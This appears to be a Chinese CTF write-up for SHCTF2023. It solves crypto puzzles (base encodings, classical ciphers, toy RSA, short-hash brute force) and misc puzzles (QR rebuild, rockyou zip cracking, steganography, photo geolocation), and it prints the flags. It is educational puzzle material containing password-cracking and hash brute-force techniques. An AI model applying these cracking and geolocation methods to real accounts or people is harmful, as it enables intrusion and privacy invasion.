SHCTF2023

Crypto

[WEEK1]Crypto_Checkin

下载附件后得到题目

1
QZZ|KQbjRRS8QZRQdCYwR4_DoQ7~jyO>0t4R4__aQZQ9|Rz+k_Q!r#mR90+NR4_4NR%>ipO>0s{R90|SQhHKhRz+k^S8Q5JS5|OUQZO}CQfp*dS8P&9R8>k?QZYthRz+k_O>0#>

使用CyberChef进行解密,发现为4层解密。分别为base85,base64,base32,hex,得到flag

base85解密结果为

1
R1kzRE1RWldHRTNET04yQ0dVMkRNT0JUR0UzVEdOS0dHTVlUT01aVklZMkRFTVpVRzRaVEdNWlZJWVpUR05TRkdZWlRHTUJXR1FaVEdOMkU=

base64解密结果为

1
GY3DMQZWGE3DON2CGU2DMOBTGE3TGNKGGMYTOMZVIY2DEMZUG4ZTGMZVIYZTGNSFGYZTGMBWGQZTGN2E

base32解密结果为

1
666C61677B546831735F31735F423473335F336E633064337D

hex解密结果为

1
flag{Th1s_1s_B4s3_3nc0d3}

[WEEK1]残缺的md5

1
2
3
苑晴在路边捡到了一张纸条,上面有一串字符串:KCLWG?K8M9O3?DE?84S9
问号是被污染的部分,纸条的背面写着被污染的地方为大写字母,还给了这串字符串的md5码值:F0AF????B1F463????F7AE???B2AC4E6
请提交完整的md5码值并用flag{}包裹提交

拿到题目后发现为根据得到的字符串匹配md5,思路为使用python遍历大写字母后组成字符串,进行md5加密。再得到符合要求的md5值

1
2
3
4
5
6
7
8
9
10
11
12
13
import hashlib

str_value = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"

for i in str_value:
    for j in str_value:
        for m in str_value:
            flag = "KCLWG" + i + "K8M9O3" + j + "DE" + m+ "84S9"
            obj = hashlib.md5()
            obj.update(flag.encode("utf-8"))
            result = obj.hexdigest().upper()
            if "F0AF" in result and "B1F463" in result:
                print(result)

得到md5值为 F0AF1443B1F463EAFFF7AEBB8B2AC4E6

[WEEK1]凯撒大帝

1
pvkq{mredsrkyxkx}

根据题目提示,加密方式为凯撒加密使用CyberChef解密

位移为16,解密结果为

1
flag{chutihaonan}

[WEEK1]进制

1
2
好熟悉的进制,但不知道加密了几层
3636366336313637376236313638363636623661366336383662363136383764

根据题目怀疑为hex

第一层解密后得到

1
666c61677b6168666b6a6c686b61687d

第二层解密后得到

1
flag{ahfkjlhkah}

[WEEK1]okk

题目:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook! Ook! Ook! Ook!
Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook. Ook? Ook! Ook. Ook? Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook!
Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook? Ook. Ook? Ook! Ook. Ook? Ook! Ook! Ook! Ook! Ook! Ook!
Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook! Ook!
Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook.
Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook! Ook. Ook.
Ook. Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook? Ook! Ook! Ook. Ook? Ook. Ook. Ook.
Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook.
Ook? Ook! Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook! Ook. Ook?
Ook.

通过okk解密后得到

1
flag{123456789}

[WEEK1]熊斐特

题目:

1
2
熊斐特博士发现了一种新的密码。
uozt{zgyzhs xrksvi}

根据题目,加密为埃特巴什码

解密后得到

1
flag{atbash cipher}

[WEEK1]迷雾重重

题目:

1
2
3
4
5
6
7
8
题目描述:

morse?ASCII?


密文:

0010 0100 01 110 1111011 11 111 010 000 0 001101 00 000 001101 0001 0 010 1011 001101 0010 001 10 1111101

根据题目尝试通过摩斯密码解密得到

1
flag{morse_is_very_fun}

[WEEK1]难言的遗憾

1
2
3
4
5
6
7
8
题目描述:
我们本可以早些进入信息化时代的,但是清政府拒不采纳那份编码规则。 (注:flag为中文,使用flag{}包裹提交)



密文:

000111310008133175592422205314327609650071810649

根据题目猜测为中文电码,解密后得到

1
一天不学高数我就魂身难受

[WEEK1] 小兔子可爱捏

1
2
3
题目描述:宇宙的终极答案是什么?
U2FsdGVkX1/lKCKZm7Nw9xHLMrKHsbGQuFJU5QeUdASq3Ulcrcv9
你可能会需要一把钥匙,钥匙就是问题的答案。

根据题目判断为rabbit加密,密钥为42

解码后得到

1
flag{i_love_technology}

[WEEK1] what is m

1
2
3
4
5
6
7
from Crypto.Util.number import bytes_to_long
from secret import flag

m = bytes_to_long(flag)
print("m =",m)

# m = 7130439814059477413771863538044548993245251660073838020411807105607801507451075252124658989164881490641702328395728224520288268685033299812787734568748819610532741806627627101671065156596093

根据题目,将flag由bytes转为long,想获得flag只需将m由long转bytes

1
2
3
4
5
6
7
8
9
10
from Crypto.Util.number import bytes_to_long, long_to_bytes
"""from secret import flag

m = bytes_to_long(flag)
print("m =",m)
 """
m = 7130439814059477413771863538044548993245251660073838020411807105607801507451075252124658989164881490641702328395728224520288268685033299812787734568748819610532741806627627101671065156596093

flag = long_to_bytes(m)
print("flag:", flag)

得到flag为

1
flag{ther3_are_SeVeRA1_a1TeRNat1VES_to_TH3_1ON6_t0_8yteS_fuNc7l0n_24A9B2EF44d1}

[WEEK1]黑暗之歌

题目:

1
⠴⡰⡭⡳⠴⡰⡭⡰⡷⡲⡢⡩⡭⡡⠯⡩⡭⡡⡺⡩⡭⡡⠳⡩⡭⡡⡺⡩⡭⡡⡶⡩⡭⡡⡶⡩⡭⡡⡲⡩⡭⡡⡺⡩⡭⡡⠯⡩⡧⡊⡢⡩⡭⡡⠯⡩⡭⡡⡺⡃⡰⠫⡋⡚⡲⡍⡋⡮⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡃⡴⡵⡋⡁⡬⡵⡋⡁⡬⡵⡋⡁⡬⡳⡋⠲⠴⡯⡃⡗⠴⡰⡭⡴⠴⡰⡭⡶⡷⡲⡢⡩⡧⡊⡢⡩⡭⡡⡺⡩⡭⡡⡺⡩⡭⡡⠳⡩⡧⡊⡢⡩⡭⡡⠯⡩⡧⡊⡢⡃⡴⡵⡋⡚⡱⠫⡋⡚⡱⠫⡋⡚⡲⠵⠲⡺⠰⠽

经过盲文解码后(解码网站

1
4pms4pmpwrbima/imazima3imazimavimavimarimazima/igJbima/imazCp+KZrMKn4pmvwrbigJbCtuKAluKAluKAlsK24oCW4pmt4pmvwrbigJbimazimazima3igJbima/igJbCtuKZq+KZq+KZrz0=

base64解密之后

1
♬♩¶♯♬♭♬♫♫♪♬♯‖♯♬§♬§♯¶‖¶‖‖‖¶‖♭♯¶‖♬♬♭‖♯‖¶♫♫♯=

音符密码解密之后

1
flag{b2cc-9091-8a29}

[WEEK1] really_ez_rsa

题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from Crypto.Util.number import getPrime, bytes_to_long
e = 65537
m = b''

p = getPrime(128)
q = getPrime(128)
n = p * q
m = bytes_to_long(m)
c = pow(m, e, n)

print("p =", p)
print("q =", q)
print("c =", c)
print("e =", e)
# p = 217873395548207236847876059475581824463
# q = 185617189161086060278518214521453878483
# c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
# e = 65537

题目中给出了qpec,直接写出解密脚本解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Util.number import long_to_bytes
import gmpy2


p = 217873395548207236847876059475581824463
q = 185617189161086060278518214521453878483
c = 6170206647205994850964798055359827998224330552323068751708721001188295410644
e = 65537

phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = gmpy2.powmod(c,d,p*q)

print(long_to_bytes(m))

得到flag为

1
flag{Y0ung_meiyou_xiaojj}

[WEEK2] 哈希猫

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import hashlib
from secret import flag

assert flag[:5] == "flag{"
assert flag[-1:] == "}"
flag = flag[5:-1]
assert len(flag) == 43


print(hashlib.sha224(flag[0:2].encode()).hexdigest())
print(hashlib.sha256(flag[2:4].encode()).hexdigest())
print(hashlib.sha1(flag[4:7].encode()).hexdigest())
print(hashlib.sha1(flag[7:10].encode()).hexdigest())
print(hashlib.sha512(flag[10:12].encode()).hexdigest())
print(hashlib.md5(flag[12:15].encode()).hexdigest())
print(hashlib.sha256(flag[15:17].encode()).hexdigest())
print(hashlib.sha384(flag[17:19].encode()).hexdigest())
print(hashlib.sha256(flag[19:21].encode()).hexdigest())
print(hashlib.sha256(flag[21:23].encode()).hexdigest())
print(hashlib.sha256(flag[23:25].encode()).hexdigest())
print(hashlib.sha512(flag[25:27].encode()).hexdigest())
print(hashlib.sha224(flag[27:29].encode()).hexdigest())
print(hashlib.sha384(flag[29:31].encode()).hexdigest())
print(hashlib.md5(flag[31:34].encode()).hexdigest())
print(hashlib.sha512(flag[34:36].encode()).hexdigest())
print(hashlib.sha224(flag[36:38].encode()).hexdigest())
print(hashlib.sha256(flag[38:40].encode()).hexdigest())
print(hashlib.sha512(flag[40:42].encode()).hexdigest())
print(hashlib.md5(flag[42:43].encode()).hexdigest())


# 705460fa432983620cfdf55397e43161edf3367cdafe157ca0b46bc6
# ec61c8382b2d371090060b081d3c567f022bb6defd91e9defcbbe0787f080882
# 2b3e56ece4f0b1dadf21c5f01c1cd1124bdbbe45
# d309bebf43d3cdf7dfd1bc7e1de16f8b5b12deac
# e91e6821acdad6a65eff85d9d0b11df30392ce5f1c424058bce0029bf390d923d43d6d1ab3d84a638712bba566cbb18743ed372aa1c95ec7c83177d74e60cb20
# 90f80fa3a342375d71f427bf2fd61cd2
# ef2a3319810f3ae9cd5948f3229bc195d7b1558846487473b21a842f9d1b503b
# b655988f676a1494a400c8acead965a04b828e9538887e471a7985a12523cbe8027b838b49e7c548b43a633dfa81b010
# 688c5a4a65af33d6ddb7a8cb8e0d934e42d0f417a1b0fb6f755e050aa15a9dae
# fdee4726c2847c8788b39cb69f2777cf672711bb11d9622b07f0fe23fac1480e
# 051603900bc7a27051b385299b0ef6c3dd2da3c6216845df7f501d9e4337cbcd
# 38f3476fe78a5ac95ed2e2da792de22645c92f1466b30704c6d8d5d725325da9c742c5e8a3704caaea8b19d4b211780d32b7658958b6bb3f58f6f868f86e522c
# b162f6c91e9d02b7eba0c8dc0d4b0ac20002d47bcafa29699a54a682
# 34cfd54dcf443a572cbfa7c1cb90af1b580b98d4d42274ea3c99c25390065a985c81354ddc2e54e243f5be21b90f435b
# 50680fbb1bc80ff7ac8d5cdd0bee77fd
# 5b1fac8ceb254baeb8a794c105ef61f99b59d592ad1803b614be85fe12311a9b68307570f4e996fb20dbe82e2fcd65b0da16ecfa5577cebf178e0beabe271112
# a715591d887d66ed248ae4cc5aea34995d2feeb1130de534a7ecfdde
# 472e73d796e20aa8ff9059e6316f218e0322548f661ec4dc267507ed66317404
# d364a863110f07538a9f0e6b1e42b382979a7b26a53a554ecd35b8f08634ee8067119c4ddc48b9b1a0f6c266fdaeb698dfda95f122b2314e55700aa244fbe138
# 45c48cce2e2d7fbdea1afc51c7c6ad26

根据题目,由于flag被分为多组进行加密,所以每次hash加密是明文的长度很小,所以考虑进行爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
import hashlib
str_list = "0123456789!#$%&'()*+-/=<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_"
str_listt = []
for i in str_list:
    for j in str_list:
        strw = i + j
        str_listt.append(strw)
for i in str_listt:
    if hashlib.sha224(i.encode()).hexdigest() == "705460fa432983620cfdf55397e43161edf3367cdafe157ca0b46bc6":
        a1 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "ec61c8382b2d371090060b081d3c567f022bb6defd91e9defcbbe0787f080882":
        a2 = i
    else:
        pass     
for i in str_list:
    for j in str_list:
        for m in str_list:
            n = i + j + m 
            if hashlib.sha1(n.encode()).hexdigest() == "2b3e56ece4f0b1dadf21c5f01c1cd1124bdbbe45":
                a3 = n
            else:
                pass
for i in str_list:
    for j in str_list:
        for m in str_list:
            n = i + j + m
            if hashlib.sha1(n.encode()).hexdigest() == "d309bebf43d3cdf7dfd1bc7e1de16f8b5b12deac":
                a4 = n
            else:
                pass  
for i in str_listt:
    if hashlib.sha512(i.encode()).hexdigest() == "e91e6821acdad6a65eff85d9d0b11df30392ce5f1c424058bce0029bf390d923d43d6d1ab3d84a638712bba566cbb18743ed372aa1c95ec7c83177d74e60cb20":
        a5 = i
    else:
        pass 
for i in str_list:
    for j in str_list:
        for m in str_list:
            n = i + j+ m
            if hashlib.md5(n.encode()).hexdigest() == "90f80fa3a342375d71f427bf2fd61cd2":
                a6 = n
            else:
                pass 
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "ef2a3319810f3ae9cd5948f3229bc195d7b1558846487473b21a842f9d1b503b":
        a7 = i
    else:
        pass 
for i in str_listt:
    if hashlib.sha384(i.encode()).hexdigest() == "b655988f676a1494a400c8acead965a04b828e9538887e471a7985a12523cbe8027b838b49e7c548b43a633dfa81b010":
        a8 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "688c5a4a65af33d6ddb7a8cb8e0d934e42d0f417a1b0fb6f755e050aa15a9dae":
        a9 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "fdee4726c2847c8788b39cb69f2777cf672711bb11d9622b07f0fe23fac1480e":
        a10 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "051603900bc7a27051b385299b0ef6c3dd2da3c6216845df7f501d9e4337cbcd":
        a11 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha512(i.encode()).hexdigest() == "38f3476fe78a5ac95ed2e2da792de22645c92f1466b30704c6d8d5d725325da9c742c5e8a3704caaea8b19d4b211780d32b7658958b6bb3f58f6f868f86e522c":
        a12 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha224(i.encode()).hexdigest() == "b162f6c91e9d02b7eba0c8dc0d4b0ac20002d47bcafa29699a54a682":
        a13 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha384(i.encode()).hexdigest() == "34cfd54dcf443a572cbfa7c1cb90af1b580b98d4d42274ea3c99c25390065a985c81354ddc2e54e243f5be21b90f435b":
        a14 = i
    else:
        pass 
for i in str_list:
    for j in str_list:
        for m in str_list:
            n = i+j+m
            if hashlib.md5(n.encode()).hexdigest() == "50680fbb1bc80ff7ac8d5cdd0bee77fd":
                a15 = n
            else:
                pass
for i in str_listt:
    if hashlib.sha512(i.encode()).hexdigest() == "5b1fac8ceb254baeb8a794c105ef61f99b59d592ad1803b614be85fe12311a9b68307570f4e996fb20dbe82e2fcd65b0da16ecfa5577cebf178e0beabe271112":
        a16 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha224(i.encode()).hexdigest() == "a715591d887d66ed248ae4cc5aea34995d2feeb1130de534a7ecfdde":
        a17 = i
    else:
        pass
for i in str_listt:
    if hashlib.sha256(i.encode()).hexdigest() == "472e73d796e20aa8ff9059e6316f218e0322548f661ec4dc267507ed66317404":
        a18 = i
    else:
        pass 
for i in str_listt:
    if hashlib.sha512(i.encode()).hexdigest() == "d364a863110f07538a9f0e6b1e42b382979a7b26a53a554ecd35b8f08634ee8067119c4ddc48b9b1a0f6c266fdaeb698dfda95f122b2314e55700aa244fbe138":
        a19 = i
    else:
        pass 
a20 = '9'

flag = a1 + a2 + a3 + a4 + a5 + a6 + a7 + a8 + a9 + a10 + a11 + a12 + a13 + a14 + a15 + a16 + a17 + a18 + a19 + a20
print(flag)

Misc

[WEEK1]请对我使用社工吧

根据给到的图片,我们可以发现的信息有,万达东厅,一家幸运好玩的点,以及商城的部分装饰

1

前往搜索引擎搜索一家幸运好玩的店找到一张图片如下

其中发现彩票店后的楼梯与题目中给出的类似,确定社工的地址为山东东营,东营只有一所中国石油大学,所以flag{山东省____东营市____东营区_中国石油大学}

[WEEK1] 也许需要一些py

打开题目压缩包后得到摩斯电码,解密后得到

1
this1sy0ukey

作为密码成功解压压缩包

得到无后缀文件与txt文件

使用010打开flag文件后发现文件头损坏改为png文件头后成功打开

结合flag.txt文件后

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import hashlib

def letter(s:str):

    res=[]
    def dfs(idx,n,s:str):
        if idx ==n:
            res.append(s)
            return
        if s[idx].islower():
            dfs(idx+1,n,s[:idx] +chr(ord(s[idx])-32) +s[idx +1:])
        if s[idx].isupper():
            dfs(idx+1,n,s[:idx] +chr(ord(s[idx])+32) +s[idx +1:])
        dfs(idx +1,n,s)
    dfs(0,len(s),s)
    return res

for s in letter("pNg_and_Md5_SO_GreaT"):
    if hashlib.md5(s.encode(encoding='UTF-8')).hexdigest() == "63e62fbce22f2757f99eb7da179551d2":
        print(s)
        print("su")
        exit()

得到flag为

1
flag{Png_AnD_md5_so_GReAt}

[WEEK1] ez-misc

打开01game文件后发现841个0和1,841为29x29,判断为二维码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from PIL import Image

strings = open(r"01game.txt",'r').read()

pic = Image.new("RGB",(29,29))
num = 0
for x in range(29):
    for y in range(29):
        if strings[num] == '1':
            pic.putpixel((x,y),(0,0,0))
        else:
            pic.putpixel((x,y),(255,255,255))
        num +=1
pic.show()

得到二维码

扫描后得到

1
hit_k1sme4_4_fun

得到压缩包密码,成功解压出flag文件,使用010打开后发现为zip文件,更改后得到带密码的压缩包,并带有hint

1
01110010011011110110001101101011011110010110111101110101

解密为

1
rockyou

联想到kali的rockyou密码本,使用密码本爆破得到密码为

1
palomino

得到flag.txt中为

1
ksgeylalssgSlHffgS{{gHklesgg{afkH{lHalSkgygf{{kfgslg1l11Ss{ellal{f{fka{l{gllaHf1elSsa14Hyl}f}Slmyfg4gleSlk1k{Sfggga4aHg}SlllgHHfgy1Sgaakfga1HmH{sylgs{ffkHyyaals{S{almklagfskyg{f1a1yffe{{SSSylHagf1{S{Ham{Sf}ga}fHlgl{aSl1{lkyfff}flkHffaagHegSaHSkafgH{ymaykSylS{{1llf{efeHfaalaSafflmSlylaslfk}mlllaaHSfk{SyH{yayyf{lyy1ylaff{aaygfl2333amSaeHy{fms{ySamkSga{ffylaalHlfgfglafHSSH{algmff1SSHHflSkSeygff14sgSl1ff41HkHaaal{k553klgfffmslk{Haylam{{llfggSlggaya{SaSg{lya{fflyaafk{aflkgay{kHg{fgkff1{akefeSlfmySkgglka{mSfmSemgykSSl1gfgHllgkygmfafmfakaaegafHgklSklaaH1HglgfeS41lgkS{ggaHmmSlfykfas4f{afgHaa{ylaf{{eHS4lHf{gfg{eSlSf{gsaSgyfSyHfHHagkSaS{{fa1yalsf{flf1f{{{fafakfsmaef4amHsyfSaH56789gfl{{{1yySlkael41Say{faffaSHy4Ss{eHyfmlykSm}{{ygaalgg{kHlHelffHasfaaf{SykfS666l{SS1{SygfgaHgSllf4effgHHykklSl1ga1lHafsy{f{141yaakllla1al4SaffgflalkSS1llg1{af{SyygsSSseHffemfHlaflfgkeag{gfSgmlkmflSlgHkSfylffllHya{ksgySlHHglg{H1lyf{f1gggHaffS{afalafg7825fakaSfyfg11gfHkfySsaaafff1{mfgalfa{gay1ySf{asHgg1HaHfkl1la11fsg{S11all{g{lyfHeala{f1agg{fHHglH1{SSfaSleyayaSy{yHylyHHl{ggayf}f11a{asf{gmf{{{SykHk1sSm1l}sgmSSff11a}SaSfHsmg}g{kallf{llHssl{ffsffagHgkHaa{f{f{alfglgaaS4sgHmkgSagl1lfSslfHyf{fglH{llfsaaSaglslgy11yfykHygf{lyfyfg}gafgSfaeg4fka{SaHllk{{fks{1f1S1gyl{fflkyllafHl1Sslgyga{llkHlHyaylgaf{skSH1yyfgf{Sflg{4aHSa{kkekH{yygmygl{gf1aleglfm{ygHSHHykSH{Hl{y{{Sa{k{gg1ayfayg{gSg{ffg1llHsa{Hls1Slfg{m{fHHf{mm{l1llk{fffeyH4falla#s1{lyggaykeffS{lkgls{gkeak{l1gS{kH4f{lglgkSagS1yfem11{ml1fsklyllSlgfseag{glkSSfl1ylffalmgfsfaHly4k{saSSkkSH{malf{{g{gSm1lafyy{lsall}aHg1aafaS1klSaHHa{llfSesaySgafgeySllaH1s{gygHHSfy{HSa{l{ffka1alkfagsge{lfgflgk{Slfl{ya{gff1aHmfSgHSsf1SalS5656alfyyllfa{yk{s{{lfaSay{{gaH{HS{aSly1slyHfgaHm{S{ggffmSHakafaSHmSHS{alkggfkHHgy{eS1g{HklfHgH{a41a{gsflgfaygSsfaglygl1ffHlysllsSsf{HlHaaSl{kgflkH{sgykyHfsyHly{klHgSfSal4f1lya4lkala{f(SH{laf1kffyylfflgffg}Sa1HsllSSS1aHgglHl{alHffg1eylsffsysllkSfllgylS{fHSSmlagHflSH1Hmalsg{af{SlySleyfHfasH}SeyalslkagySHaffaffmfggaam1kal{Sff{{alg{s{lsgHmaHSmllgHfaHSl11sHlgygskgHmkaaa1fllfggf{ggygffygfyfkgS1sgS{gfflHa1lagSe{fffga1sS{{H{gSsfHSg}Ha{Slf#$%1asa1gyfllS{yflyg1sSSmkfyykfggaHfHHkSfa{fSleskmagslgeflllayff{ySslySl}kf{agsgkkmHklHSs{k}glllmys1fSll1fSgyy{{sa{mga{gaka1lH1malfklSHaaklfklf1fglakalyaHas1ff4HfffSayg{{gH1kse{gage{skHaSHy1fekHgayk1gkgmS{g{1glgSfy{mg{asg{fkafalfygf{l1SHSl1ka{{ayHkS1g{ay1glSaSHa{Hsff1lfS4H{{ae1lHSlllSmafHSH{kak{ggy1H{fagSH4a1HfSgl{a}a{Sf{lHHf{kayl1l{flSfglfelySggfal{a}{aa{S1gf1SaHfaf{SmaSgHl{falHyggHg{ggglff{klfkSfyllSgk}gfafayHHygaflkS{als{SflkSls1fSgygygf4fHHge}flyggafS{fmafl{fyykHafSHH{14af1ysaH{lkfk{kSS1{fafH{1mHall{sflffa1fl1llf1SkyfafeHa{gfkSlggfsgmSlH{gSllHaSHa1{faSyllyysa{1sfla{1SmfSgy1lslayfaya1agHl4a{fSmmaklHkafkfHfgyHSS{{ay{ylaH1ylHH{gsyHHflfSyg2^%efSlfygg{Sfa{{kSfy{fHlaag{lllagl{aSfkHkgaSfafSfSafl1yss1ymHSSseafk{{a{f{Sa{Hsffffyam4HmmkSakfagyHkglgSefsagmHSaa{lSlykH{lSlHagysgak{llfys{4{Sl4gyamfa{yllf{SSgf{{4g{{alfkg{yklaSgyklyHglsalgfaS4aH4llk{Sl{gkyH{kgsSg{kgkma}kya{sgf{Hfll1ay@gk4sSgeHg{4fHlsskaSaaffffHHSgakSmS1lsa{gsSf{gfylH{l1{gHSaga{lgkkHHH{mfkgHaf1{SlSkHffggsH{HlHmSyfylHSg1SlgggafSHSalfgfae1S1amHfele{lyf11SgSsS{fSs1g{S1yyfSylS{sgSlg{lflSSeaSSgsHSegllygylaflag{}fglgHlSaH{SsaalyHfgkalfyfHmly1fsyyySS4SasagflaS{{yfayl4HHlksl{lHkfSlfyaaff}HkffgSyHl{a1{gSglsafSmfegsgsHfkafSg{falmgf}{llHHkHkHyslagHyfg{f{{lSe{gaSmfH1y{{g{}as1{{af{flH{gaglSSaSaSffg1afgallggyaa{{yalS4ykSySk1gky{gs{g{ll1lSlyafykgg1fs{4{1fslfS{slkSy4mskHkflyf{lk4f1aS2359afall1kk{eg1fyH{l1agylyf{HkSyg{mall{l1g1f1laayfHslalykkylslma{4s{HagSka1Hsal1kHkSSfSy1{Skyags{kHmfglglf{lg{fa1fgSmllmffksgafgl1aa{lmmay{ySglHfH4l4Hf{{{gllylgSafHgfHllSefgaSlf{fgf{lgSS@syl{gkSmkaykllHSy1ffkSS1aSfeggSgsyflHaHHlkklHaslf{}Ss{laaHalHSHyskSgkySl{{Sgsaf1Hlfaykg{Hkll{sasl1ffe{{kkkfgy1ffHflsglfgSfHffy11y{fffly1yklk{fHHmagalfygHaglfSfSSakfflaHffl{ffglfaHg{skaal{fHfSSfy1Hfffmy{llllffma{eaS{s{lgHHlSaef1glSfgH4esaSyHy{aSfagHlkll1fkfHf{m1SsSk}ygfylgS11{flkflkaksflafk{llsfafsfay{1lfgygHSgfH4gSfS{mySHasf1aSkffsykkS1lfHagffa{fHlyaHe{SSfS{}S{gyykefkl{{afl1ffykSkyH{klSsgfSk{g1{f1klffSsa1{afaagH{s{a{1agafa1sfgmkf1gfylggSfkaSalHffHgf{gHSfgHsglmllsllyfmH{sySSgHSaa1flSfgkglms4{HffHgfgSaglafg{yakgg{algfyl{HH1feaagllgsHlfglaHkfkfglfy1{mHlmgfkSay1fHkfskmsyklsyska{{1HagHSySkHleflakkH{Sgfy{faff{Hgmk1fky1lffag{fSggySamlyfgffHgll{lfkSfHafyfal@@@ffllkmylf{yklH{aya{14yla{SlllyaHaaa{e1gamamaSskmkaafyalgffle{aHym{s1lf{l1aaSe{lgHf{klkHH{{{HlfyHaHaa1Sa{SSggHl1{magf11kH1kHsyg{{g1{afySmy111klykagHSksgflesggggleg{aalSm{asgfg1{ylHfa{alSllg{HkggksHlfml{a1HafamflHaa1alfygHSgS1l1fHaa1maSa{lfalalkSyaa{f

使用字频分析得到flag

1
flag{SHyk1sme4}

[WEEK1]签到题

题目:

1
Wm14aFozdDBhR2x6WDJselgyWnNZV2Q5

使用两次base64解密后得到

1
flag{this_is_flag}

[WEEK1]Steganography

解压后得到两张图片,压缩包。先对careful.jpg分析

使用010打开后发现结尾有

1
MTJlcmNzLi4uLi45MDlqaw==

解密后为

1
12ercs.....909jk

对careful1.jpg分析,查看属性后发现

1
xqwed

替换之前得到的字符串中的五个点后得到

1
12ercsxqwed909jk

解压压缩包得到

1
flag{4d72e4f3-4d4f-4969-bc8c-a2f6f7a4292c}

[WEEK1] 可爱的派蒙捏

将图片使用binwalk分离后得到两端文本,对比两段文本的不同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
def read_file(file_path):  
   with open(file_path, 'r', encoding='utf-8') as file:  
       return file.read()

def compare_files(file1_content, file2_content):
    flag = ''  
    for i in range(len(file1_content)):  
        if file1_content[i] != file2_content[i]:  
           flag += file2_content[i]
    return flag
if __name__ == "__main__":  
    file1_path = r"C:\Users\g0ubu1i\Desktop\SHCTF\Misc\WEEK1\可爱的派蒙捏\_1.jpg.extracted\txt1.txt"  
    file2_path = r"C:\Users\g0ubu1i\Desktop\SHCTF\Misc\WEEK1\可爱的派蒙捏\_1.jpg.extracted\txt2.txt"
    file1_content = read_file(file1_path)  
    file2_content = read_file(file2_path)
    flag = compare_files(file1_content,file2_content)
    print(flag)

得到flag

1
flag{4ebf327905288fca947a}

[WEEK1] message

题目

1
0001000D91683106019196F40008C26211002072B975915730671B54114F60000A000A592982B15C065265843D8A938A00000A000A5E8A9AA453D883525730000A000A91527CBE518D6E1751656CEA75D5000A000A6C899ED852305BF94E0D8D77000A000A8FD94E0053CC624B535191195230002062B14F4F4F6000530048004300540046007B00620061003900370038003400300035002D0062003100630038002D0038003400370063002D0038006500360039002D006600360032003100370037006500340063003000380037007D

直接进行hex解码后得到

1
S H C T F { b a 9 7 8 4 0 5 - b 1 c 8 - 8 4 7 c - 8 e 6 9 - f 6 2 1 7 7 e 4 c 0 8 7 }

[WEEK1] 真的签到

关注公众号

[WEEK1] 远在天边近在眼前

下载压缩包后发现flag在文件夹名中间并反向

1
